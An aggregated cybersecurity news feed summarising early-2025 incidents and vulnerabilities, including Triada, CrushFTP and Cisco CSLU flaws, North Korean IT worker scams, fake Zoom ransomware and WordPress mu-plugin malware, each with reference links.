CyberSecurity news

FlagThis

@The DefendOps Diaries //
A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, raising significant cybersecurity concerns. This sophisticated malware, initially identified in 2016, has evolved to embed itself deeply into the Android system framework, making it difficult for users to detect or remove. Discovered on counterfeit versions of popular smartphone models sold at discounted prices through online stores, Triada poses a severe threat as it can steal user data immediately after device setup.

Triada's capabilities include stealing user data, such as social media and messenger accounts, and manipulating cryptocurrency transactions by replacing wallet addresses. The malware can also falsify caller IDs, monitor browser activity, and even activate premium SMS services. Experts warn that this new version infiltrates the device at the firmware level, indicating a compromised supply chain and urging users to exercise caution and purchase Android devices from reputable sources.

Recommended read:
References :
  • bsky.app: A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up.
  • BleepingComputer: A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up.
  • The DefendOps Diaries: Explore the threat of Triada malware in counterfeit Android devices and learn how to protect against this sophisticated cyber threat.
  • BleepingComputer: A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up.
  • www.it-daily.net: Triada Trojan discovered on counterfeit Android smartphones

@The DefendOps Diaries //
A critical vulnerability, identified as CVE-2024-20439, has been discovered in the Cisco Smart Licensing Utility (CSLU), a Windows application used for managing licenses. This flaw exposes a built-in backdoor admin account due to an undocumented static user credential. Unauthenticated attackers are now actively exploiting this vulnerability to gain remote administrative access to unpatched systems through the CSLU app's API. Cisco has urged administrators to immediately apply the necessary patches to prevent unauthorized access and mitigate the risk.

The exploitation of CVE-2024-20439 allows attackers to bypass normal authentication procedures and gain control over the CSLU API. This provides them with the ability to manage services, extract sensitive data, and potentially move laterally within affected networks. The U.S. CISA has added this Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog, highlighting the severity and active exploitation of this vulnerability. The vulnerability was first disclosed by Cisco in September 2024 and has since been actively exploited in the wild, raising significant concerns about network security.

Recommended read:
References :
  • bsky.app: CISA adds a Cisco Smart Licensing Utility Static Credential flaw tracked as CVE-2024-20439 to the KEV database. This flaw allows unauthenticated attackers to log in using the hardcoded credential.
  • BleepingComputer: Cisco warns admins to patch a critical Cisco Smart Licensing Utility (CSLU) vulnerability, which exposes a built-in backdoor admin account now used in attacks.
  • The DefendOps Diaries: Explore the critical Cisco Smart Licensing Utility vulnerability and learn mitigation strategies to protect your network.
  • BleepingComputer: Cisco warns admins to patch a critical Cisco Smart Licensing Utility (CSLU) vulnerability, which exposes a built-in backdoor admin account now used in attacks.

Michael Kan@PCMag UK security //
North Korean threat actors are expanding their IT worker scams to Europe, according to recent reports from Google's Threat Intelligence Group and other security researchers. These actors, posing as remote IT staff, are targeting companies in Germany, Portugal, and the UK, seeking employment in various sectors, including the defense industry and government. This shift comes after increased awareness and crackdowns in the United States made it more difficult for them to maintain employment there. The ultimate goal of this scheme is to generate revenue for the North Korean government, steal sensitive data, and potentially extort companies.

The North Korean IT workers use fabricated identities, claiming nationalities from countries such as Italy, Japan, Malaysia, Singapore, Ukraine, the US, and Vietnam. They often operate multiple personas simultaneously, with one individual found to have at least 12 identities across Europe and the US. To secure employment, they provide fake references, build rapport with recruiters, and even utilize online platforms like Upwork, Telegram, and Freelancer. Payments are typically facilitated through cryptocurrency to obfuscate the flow of funds back to North Korea. This sophisticated operation highlights the global reach and adaptability of North Korean cyber threat actors.

Recommended read:
References :
  • Risky Business Media: Risky Bulletin: North Korean IT worker scams expand to Europe
  • PCMag UK security: As US Cracks Down, North Koreans Target Europe With Remote Work Scams
  • : North Korea's Fake IT Worker Scheme Sets Sights on Europe
  • www.itpro.com: Google warns that fake North Korean IT workers have expanded to Europe
  • The Register - Security: North Korea’s fake tech workers now targeting European employers

Matt Swayne@The Quantum Insider //
Recent developments highlight ongoing efforts to transition to quantum-safe cryptography. The UK's National Cyber Security Centre (NCSC) has provided a roadmap for post-quantum cryptography (PQC) migration, urging organizations to complete a discovery phase by 2028, high-priority migration activities by 2031, and full transition by 2035. This roadmap aligns with similar initiatives, such as the US focus on post-quantum cryptography, signaling a global push to mitigate the threat posed by future quantum computers. Unisys has also launched Post-Quantum Cryptography services to strengthen cybersecurity

ETSI has launched a new post-quantum security standard designed to protect critical data from future quantum computing threats. The standard introduces Covercrypt, a hybrid encryption system that secures data by allowing only authorized users to access session keys based on specific user attributes, ensuring both current and future quantum-safe protection. Organizations are already adopting ETSI’s standard to enhance security infrastructure and comply with future-proof cryptographic requirements. Furthermore, OpenSSL 3.5 is integrating PQC methods.

Recommended read:
References :

Nazy Fouladirad@AI Accelerator Institute //
As generative AI adoption rapidly increases, securing investments in these technologies has become a paramount concern for organizations. Companies are beginning to understand the critical need to validate and secure the underlying large language models (LLMs) that power their Gen AI products. Failing to address these security vulnerabilities can expose systems to exploitation by malicious actors, emphasizing the importance of proactive security measures.

Microsoft is addressing these concerns through innovations in Microsoft Purview, which offers a comprehensive set of solutions aimed at helping customers seamlessly secure and confidently activate data in the AI era. Complementing these efforts, Fiddler AI is focusing on building trust into AI systems through its AI Observability platform. This platform emphasizes explainability and transparency. They are helping enterprise AI teams deliver responsible AI applications, and also ensure people interacting with AI receive fair, safe, and trustworthy responses. This involves continuous monitoring, robust security measures, and strong governance practices to establish long-term responsible AI strategies across all products.

The emergence of agentic AI, which can plan, reason, and take autonomous action to achieve complex goals, further underscores the need for enhanced security measures. Agentic AI systems extend the capabilities of LLMs by adding memory, tool access, and task management, allowing them to operate more like intelligent agents than simple chatbots. Organizations must ensure security and oversight are essential to safe deployment. Gartner research indicates a significant portion of organizations plan to pursue agentic AI initiatives, making it crucial to address potential security risks associated with these systems.

Recommended read:
References :

@The GreyNoise Blog //
Cybersecurity researchers have issued a warning about a significant surge in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways. Nearly 24,000 unique IP addresses have been observed attempting to access these portals, raising concerns among experts. The activity is suspected to be a coordinated effort aimed at identifying exposed or vulnerable systems, potentially as a precursor to targeted exploitation. GreyNoise, a threat intelligence firm, has indicated that this pattern suggests a systematic probing of network defenses.

The surge reportedly began on March 17, 2025, with the number of unique IP addresses involved peaking at nearly 20,000 per day before tapering off around March 26. Of the total IPs involved, a smaller subset of 154 have been flagged as malicious. The United States and Canada have been identified as the primary sources of the traffic, while systems in the United States, the United Kingdom, Ireland, Russia, and Singapore are the main targets. Organizations using Palo Alto Networks products are urged to take immediate steps to secure their login portals.

Recommended read:
References :
  • The Hacker News: Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign
  • The Hacker News: Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign
  • BleepingComputer: Nearly 24,000 IPs behind wave of Palo Alto Global Protect scans
  • The GreyNoise Blog: Surge in Palo Alto Networks Scanner Activity Indicates Possible Upcoming Threats
  • securityaffairs.com: Spike in Palo Alto Networks scanner activity suggests imminent cyber threats

Pierluigi Paganini@Security Affairs //
References: bsky.app , CyberInsider , The Apple Post ...
Apple has released security updates to address actively exploited zero-day vulnerabilities impacting older iPhones and Macs. The patches aim to fix flaws that could allow malicious actors to elevate privileges or execute arbitrary code on affected devices. These updates address CVE-2025-24200, CVE-2025-24201, and CVE-2025-24085, and are now available for iOS 15.8.4, iPadOS 15.8.4, iOS 16.7.11, iPadOS 16.7.11, macOS Sonoma 14.7.5, and macOS Ventura 13.7.5.

The vulnerabilities include a use-after-free bug in the Core Media component (CVE-2025-24085), an authorization issue in the Accessibility component (CVE-2025-24200), and an out-of-bounds write issue in the WebKit component (CVE-2025-24201). Apple addressed the flaw in iOS 18.3.1, iPadOS 18.3.1, and 17.7.5, released on February 10, 2025. CVE-2025-24200 specifically allowed attackers with physical access to locked devices to disable USB Restricted Mode. Users of older devices, including iPhone 6s, iPhone 7, iPhone 8, iPhone X, iPad Air 2, and various iPad Pro models, are urged to update their systems to safeguard against potential threats.

Recommended read:
References :
  • bsky.app: EMERGENCY UPDATES Apple pushed additional updates for 3 zero-days that may have been actively exploited. CVE-2025-24200 (Accessibility) additional patches, CVE-2025-24201 (WebKit) additional patches: - iOS and iPadOS 15.8.4 - iOS and iPadOS 16.7.11
  • CyberInsider: Apple has issued a wide set of security updates, patching multiple zero-day vulnerabilities across its operating systems — including iOS, macOS, iPadOS, and Safari — and notably extended critical fixes to older software versions, addressing previously exploited flaws.
  • isc.sans.edu: Apple Patches Everything: March 31st 2025 Edition, (Mon, Mar 31st)
  • The Apple Post: Apple releases iOS 18.4 with Priority Notifications feature, Control Center updates, new emoji, more
  • bsky.app: NEW SECURITY CONTENT - macOS Sequoia 15.4 - 131 bugs fixed macOS Sonoma 14.7.5 - 91 bugs fixed macOS Ventura 13.7.5 - 85 bugs fixed iOS and iPadOS 18.4 - 62 bugs fixed visionOS 2.4 - 38 bugs fixed iPadOS 17.7.6 - 38 bugs fixed tvOS 18.4 - 36 bugs fixed
  • CyberScoop: The company released a host of security patches Monday, including ones that address two zero-day vulnerabilities.
  • securityaffairs.com: Apple has backported fixes for three actively exploited vulnerabilities to older devices and OS versions. The three vulnerabilities are: Apple released the following updates: that are available for the following devices:
  • The Hacker News: Apple Backports Critical Fixes for 3 Live Exploits Impacting iOS and macOS Legacy Devices
  • BleepingComputer: Apple backports zero-day patches to older iPhones and Macs

@The DefendOps Diaries //
References: bsky.app , The DefendOps Diaries , Rescana ...
A critical authentication bypass vulnerability, identified as CVE-2025-2825, is actively being exploited in CrushFTP file transfer software. Attackers are leveraging publicly available proof-of-concept code to gain unauthenticated access to unpatched devices. The flaw affects CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0, with security analysts confirming that a significant number of instances remain unpatched despite the availability of patches since March 26, 2025. Project Discovery has published a technical write-up and PoC for the bypass.

The vulnerability stems from improper handling of HTTP requests utilizing S3-style authorization headers. Attackers can craft malicious AWS S3-style authorization headers containing a valid username, bypassing password verification. Once access is gained, attackers can execute administrative commands, download sensitive files, create new administrator accounts, and upload malicious payloads, potentially leading to complete system compromise. CrushFTP has addressed this in version 11.3.1 by introducing a new security parameter, s3_auth_lookup_password_supported, set to false by default.

Recommended read:
References :
  • bsky.app: Project Discovery has published a technical write-up and PoC for a recent CrushFTP authentication bypass tracked as CVE-2025-2825
  • The DefendOps Diaries: Understanding the CrushFTP Authentication Bypass Vulnerability: A Critical Cybersecurity Threat
  • BleepingComputer: Attackers are now targeting a critical authentication bypass vulnerability in the CrushFTP file transfer software using exploits based on publicly available proof-of-concept code.
  • Rescana: CrushFTP CVE-2025-2825 Vulnerability: Critical Authentication Bypass Exploit and Mitigation Strategies
  • community.emergingthreats.net: CrushFTP Authentication Bypass (CVE-2025-2825) (web_specific_apps.rules)
  • securityaffairs.com: CrushFTP CVE-2025-2825 flaw actively exploited in the wild
  • www.cybersecuritydive.com: Critical vulnerability in CrushFTP file transfer software under attack

Dissent@DataBreaches.Net //
A former GCHQ intern, Hasaan Arshad, has pleaded guilty to violating the Computer Misuse Act by transferring top-secret data from a secure GCHQ computer to his work phone. He then moved the data to a personal hard drive connected to his home PC. Arshad admitted to the unauthorized acts, which prosecutors say involved a "top secret" tool worth millions of pounds. The tool was developed using a "significant amount" of taxpayer money.

Arshad, a student at the University of Manchester, was arrested and his home searched in September 2022. While he claimed his actions stemmed from curiosity and a desire to further develop the software, the incident underscores the risk of insider threats. Cybersecurity experts highlight the need for organizations to implement strict access controls, restrict removable media, and manage mobile device capabilities in sensitive areas to prevent such breaches.

Recommended read:
References :
  • DataBreaches.Net: Here’s today’s reminder of the insider threat (well, this, and the fact that U.S. government officials continue to deny any problem with discussing attack plans on Signal).
  • The Register - Security: Not exactly Snowden levels of skill A student at Britain's top eavesdropping government agency has pleaded guilty to taking sensitive information home on the first day of his trial.…
  • www.itpro.com: A former GCHQ intern has pleaded guilty to transferring data from a top-secret computer onto his work phone.

Microsoft Threat@Microsoft Security Blog //
Microsoft has uncovered 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders using its AI-powered Security Copilot. These bootloaders are critical components, with GRUB2 commonly used in Linux distributions like Ubuntu, and U-Boot and Barebox prevalent in embedded and IoT devices. The identified vulnerabilities include integer and buffer overflows in filesystem parsers, command flaws, and a side-channel in cryptographic comparison, potentially enabling threat actors to gain control and execute arbitrary code.

Water Gamayun, a suspected Russian hacking group, has been linked to the exploitation of CVE-2025-26633 (MSC EvilTwin) to deploy SilentPrism and DarkWisp. The group uses malicious provisioning packages, signed .msi files, and Windows MSC files to deliver information stealers and backdoors. These backdoors, SilentPrism and DarkWisp, enable persistence, system reconnaissance, data exfiltration, and remote command execution. The threat actors transitioned to their own infrastructure for staging and command-and-control purposes after using a GitHub repository to push various kinds of malware families.

Recommended read:
References :
  • The Hacker News: The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of
  • Microsoft Security Blog: Using Microsoft Security Copilot to expedite the discovery process, Microsoft has uncovered several vulnerabilities in multiple open-source bootloaders impacting all operating systems relying on Unified Extensible Firmware Interface (UEFI) Secure Boot. Through a series of prompts, we identified and refined security issues, ultimately uncovering an exploitable integer overflow vulnerability in the GRUB2, U-boot, and Barebox bootloaders. The post appeared first on .
  • bsky.app: Microsoft used its AI-powered Security Copilot to discover 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders. https://www.bleepingcomputer.com/news/security/microsoft-uses-ai-to-find-flaws-in-grub2-u-boot-barebox-bootloaders/
  • BleepingComputer: Microsoft uses AI to find flaws in GRUB2, U-Boot, Barebox bootloaders

@upguard.com //
API security testing firm APIsec exposed an internal database to the internet without a password, potentially compromising customer data. The database contained customer info and other data generated while monitoring customer APIs for security weaknesses, according to researchers at UpGuard, who discovered the exposed database on March 5th, 2025. UpGuard notified APIsec, and the database was secured the same day. APIsec claims to be used by 80% of the Fortune 100.

The exposed Elasticsearch database contained over three terabytes of data, including configuration information for private scanning instances, results of API scans for customers’ endpoints, and personal information for users collected during scanning. This data provided extensive information about the attack surfaces of APIsec's customers. The database contained indices for executing the APIsec test suites against customer APIs and storing the results, with data spanning from 2018 to 2025.

The APIsec platform helps companies secure their APIs by running tests for common weaknesses. The exposed data included information about which tests were being performed, allowing attackers to potentially look for issues not being tested. The index "fx-accounts" included usernames and credentials for services like AWS, Slack, and GitHub. The index "fx-clusters" contained configuration data for APIsec scanning instances, some of which contained the same AWS access key as the record in "fx-accounts."

Recommended read:
References :
  • Zack Whittaker: New: API security testing firm APIsec exposed an internal database to the internet without a password. The database contained customer info and other data generated while monitoring customer APIs for security weaknesses, per researchers at UpGuard, which found it.
  • techcrunch.com: API testing firm APIsec exposed customer data during security lapse
  • www.upguard.com: Watching the Watcher: How a Security Company Leaked Customer Data | UpGuard
  • CyberInsider: Security Firm APIsec Exposed 3TB of Sensitive Customer Data

do son@securityonline.info //
Russia-aligned cyber threat groups UAC-0050 and UAC-0006 are actively using bulletproof hosting infrastructures to conduct cyberattacks globally. These networks, often obscured by offshore shell companies, provide a shield for malicious activities including espionage, financial theft, and psychological operations. Intrinsec analysts have uncovered campaigns blending cyber espionage, financial theft, and psychological warfare, primarily targeting Ukraine and its allies with tactics like bomb threats and fake banking transactions.

These threat groups heavily rely on bulletproof hosting providers to evade detection. Entities like Global Connectivity Solutions LLP and Railnet LLC act as legal fronts, using offshore shell companies in jurisdictions like Seychelles to make attribution and legal action difficult. This infrastructure also supports ransomware groups like Black Basta and RansomHub and involves frequent IP migrations across autonomous systems, further complicating efforts to block malicious activities. UAC-0050 has also engaged in psychological operations, such as sending bomb threats to Ukrainian institutions under the guise of the "Fire Cells Group."

Recommended read:
References :
  • securityonline.info: Bulletproof Hosting Fuels Russia-Linked Intrusion Sets’ Global Cyber Campaign
  • Cyber Security News: Russian Hackers Use Bulletproof Network Infrastructure to Evade Detection
  • gbhackers.com: Russian Hackers Leverage Bulletproof Hosting to Shift Network Infrastructure

do son@securityonline.info //
Cybersecurity analysts have uncovered a sophisticated campaign exploiting a fake Zoom installer to deliver BlackSuit ransomware across Windows-based systems. The attack, beginning with a malicious download from a website mimicking the teleconferencing application Zoom, lures unsuspecting victims into installing malware capable of crippling entire networks. When the victim clicked the “Download” button, they unknowingly triggered a chain reaction of events.

The fake installer, crafted with Inno Setup, hides the d3f@ckloader, a Pascal-based loader. After gaining initial access, the attackers deploy Brute Ratel and Cobalt Strike for lateral movement, using QDoor to facilitate RDP access. After 9 days, they deploy the BlackSuit ransomware across the network, deleting Volume Shadow Copies to hinder data recovery efforts before encrypting files and dropping ransom notes. The attackers also used WinRAR to compress file share data and uploaded the archives to Bublup, a cloud storage service for data exfiltration.

Recommended read:
References :
  • bsky.app: The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi).
  • BleepingComputer: North Korean hackers adopt ClickFix attacks to target crypto firms
  • Cyber Security News: Hackers Exploit Zoom Installer to Gain RDP Access and Launch BlackSuit Ransomware Attack
  • gbhackers.com: Beware! A Fake Zoom Installer Drops BlackSuit Ransomware on Your Windows Systems
  • Virus Bulletin: The DFIR Report researchers look into a fake Zoom installer that used d3f@ckloader & IDAT loader to drop SectopRAT, which dropped Cobalt Strike & Brute Ratel after 9 days. For later movement the threat actor used QDoor & finally deployed BlackSuit ransomware.
  • Osint10x: Fake Zoom Ends in BlackSuit Ransomware
  • securityonline.info: Fake Zoom, Real Ransom: Nine-Day Malware Intrusion Ends with BlackSuit Ransomware Blast
  • bsky.app: Lazarus adopts ClickFix technique.
  • Cyber Security News: Lazarus Hackers Use Fake Interviews “ClickFake†to Infect Windows & macOS with GO Malware
  • : New “ClickFake Interview†campaign attributed to the Lazarus Group targets crypto professionals with fake job offers
  • gbhackers.com: Weaponized Zoom Installer Used by Hackers to Gain RDP Access and Deploy BlackSuit Ransomware
  • BleepingComputer: Report of the Lazarus Group adopting the ClickFix technique for malware deployment.
  • Virus Bulletin: Sekoya researchers discovered a ClickFake Interview campaign targeting job seekers with fake job interview websites. The infrastructure aligns with technical indicators linked to the Contagious Interview campaign and delivers GolangGhost backdoor for Windows & macOS

info@thehackernews.com (The@The Hacker News //
Security researchers have uncovered a rise in hackers exploiting WordPress mu-plugins to inject malicious code. The mu-plugins directory, designed for automatically loading essential plugins, is being used to conceal malware, enabling persistent remote access and site redirection. Because these plugins are automatically enabled and not visible in the standard WordPress plugin interface, attackers can maintain a stealthy foothold, bypassing typical security checks. This allows them to inject spam, hijack site images, and maintain long-term control over compromised sites.

Researchers at Sucuri have identified three distinct types of malicious code being deployed. One variant redirects site visitors to external malicious websites, often disguised as browser updates serving malware. Another executes a webshell, providing attackers with remote code execution capabilities. The third injects spam onto the website, replacing images with explicit content and hijacking outbound links to malicious popups. The goal of this spam injection is often to promote scams or manipulate SEO rankings. These tactics are used to target website visitors while evading detection by search engines and administrators.

Website administrators are advised to include the mu-plugins directory in their regular security scans to detect and remove any unrecognized or suspicious files. Security experts recommend ensuring WordPress, plugins, and themes are updated and employing strong passwords with two-factor authentication. If a compromise is suspected, all unauthorized admin accounts and malicious files should be removed to prevent reinfection. These measures are crucial to securing WordPress sites against this evolving threat.

Recommended read:
References :
  • The DefendOps Diaries: Understanding the Threat: WordPress MU-Plugins and Security Risks
  • The Hacker News: Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images
  • BleepingComputer: Hackers abuse WordPress MU-Plugins to hide malicious code
  • www.scworld.com: WordPress attackers hide malware in overlooked plugins directory
  • Vulnerable U: Stealthy WordPress Malware Exploits Mu-Plugins Directory
  • bsky.app: Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection.
  • Cyber Security News: Threat Actors Hide Malware in WordPress Sites to Execute Remote Code
  • gbhackers.com: Threat Actors Embed Malware in WordPress Sites to Enable Remote Code Execution
  • bsky.app: Hackers exploit little-known WordPress MU-plugins feature to hide malware
  • Malware ? Graham Cluley: Hackers exploit little-known WordPress MU-plugins feature to hide malware
  • securityaffairs.com: Hiding WordPress malware in the mu-plugins directory to avoid detection
  • Risky.Biz: Hackers abuse secret WordPress feature you'll probably want to disable

Lenart Bermejo@feeds.feedburner.com //
Earth Alux, a China-linked advanced persistent threat (APT) group, has been identified launching cyberespionage attacks aimed at critical industries. Since the second quarter of 2023, this group has been targeting organizations in the Asia-Pacific (APAC) and Latin American regions, with a focus on sectors including government, technology, logistics, manufacturing, telecommunications, IT services, and retail. Trend Micro's monitoring and investigation efforts have uncloaked the group's stealthy activities and advanced techniques, highlighting the significant risk they pose to sensitive data and operational continuity.

Earth Alux primarily employs the VARGEIT malware as its main backdoor and control tool. VARGEIT is utilized at multiple stages of an attack to maintain persistence, collect data, and execute malicious operations. The malware operates as a multi-channel configurable backdoor with capabilities such as drive information collection, process monitoring, file manipulation, and command line execution. It can also inject additional tools into processes like mspaint.exe for fileless operations, making detection challenging. The group uses sophisticated techniques, including DLL sideloading, timestomping, and encrypted communication channels, to ensure stealth and evade conventional security systems.

Recommended read:
References :
  • Cyber Security News: Earth Alux Hackers Deploy VARGIET Malware in Targeted Organizational Attacks
  • Cyber Security News: The cybersecurity landscape has been disrupted by Earth Alux, a China-linked advanced persistent threat (APT) group actively conducting espionage operations since the second quarter of 2023. Initially targeting the Asia-Pacific region, the group expanded its operations to Latin America by mid-2024, primarily focusing on government, technology, logistics, manufacturing, telecommunications, IT services, and retail sectors in
  • gbhackers.com: Earth Alux Hackers Use VARGIET Malware to Target Organizations
  • Osint10x: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data. The post appeared first on .
  • www.trendmicro.com: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data.
  • securityonline.info: Earth Alux APT Group: Unveiling Its Espionage Toolkit
  • The Hacker News: China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions
  • The Hacker News: China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions
  • www.scworld.com: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data.
  • Vulnerable U: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data.
  • Vulnerable U: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk.

Pierluigi Paganini@Security Affairs //
Sam's Club, the membership warehouse club chain owned by Walmart, is currently investigating claims of a Clop ransomware breach. The Clop ransomware group has reportedly taken responsibility for the alleged security incident. The investigation aims to determine the scope and nature of the potential data compromise, with Sam's Club stating they are actively looking into the matter.

The alleged breach is tied to the Clop ransomware operation's exploitation of vulnerabilities in Cleo file transfer software. Cybernews reports that Sam's Club is among the numerous organizations purportedly affected. Sam's Club has acknowledged the situation and initiated an internal investigation, though specific details regarding the alleged compromise remain limited. The company has affirmed its commitment to protecting the privacy and security of its members' information.

Recommended read:
References :
  • securityaffairs.com: The Walmart-owned membership warehouse club chain Sam’s Club is investigating claims of a Cl0p ransomware security breach.
  • bsky.app: Sam's Club investigates Clop ransomware breach claims
  • BleepingComputer: Retail giant Sam’s Club investigates Clop ransomware breach claims
  • cyberinsider.com: Walmart has confirmed to CyberInsider it launched an internal investigation following claims by the Clop ransomware group that it compromised Sam’s Club, a membership-based retail warehouse chain owned and operated by Walmart Inc.
  • www.scworld.com: Cybernews reports that Walmart's membership-only warehouse chain Sam's Club was among the hundreds of other organizations most recently claimed to have been breached by the Clop ransomware operation as part of its attacks leveraging a Cleo file transfer software vulnerability.
  • securityaffairs.com: Sam’s Club Investigates Alleged Cl0p Ransomware Breach

@www.infosecurity-magazine.com //
References: The Hacker News , , ciso2ciso.com ...
Cybersecurity researchers are raising concerns about a new sophisticated malware loader called CoffeeLoader, designed to stealthily download and execute secondary payloads while evading detection. The malware, first observed around September 2024, shares behavioral similarities with SmokeLoader, another known malware loader. CoffeeLoader employs a variety of techniques to bypass security solutions, including a specialized packer that utilizes the GPU, call stack spoofing, sleep obfuscation, and the use of Windows fibers.

CoffeeLoader's infection sequence starts with a dropper that attempts to execute a DLL payload packed by Armoury, impersonating ASUS's Armoury Crate utility. The malware establishes persistence by creating scheduled tasks and uses call stack spoofing and sleep obfuscation to evade antivirus and EDR solutions. Upon successful connection to a command-and-control server, CoffeeLoader receives commands to inject and execute Rhadamanthys shellcode, highlighting the potential for significant harm. While there are notable similarities between CoffeeLoader and SmokeLoader, researchers are still determining the exact relationship between the two malware families.

Recommended read:
References :
  • The Hacker News: Researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads.
  • : Security firm spots stealthy CoffeeLoader used in attacks
  • www.scworld.com: Windows devices have been targeted with attacks involving the novel CoffeeLoader malware that masquerades as Taiwanese computer hardware firm ASUS's Armoury Crate utility to covertly distribute the Rhadamanthys information-stealing malware and other malicious payloads, Cybernews reports.
  • ciso2ciso.com: Cybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads.
  • bsky.app: Zscaler has spotted a new malware loader named CoffeeLoader, used in the wild since September of last year. The malware was used together and appears to bear similarities with SmokeLoader.
  • securityaffairs.com: CoffeeLoader uses a GPU-based packer to evade detection
  • securityonline.info: GPU-Powered Evasion: Unpacking the Sophisticated CoffeeLoader Malware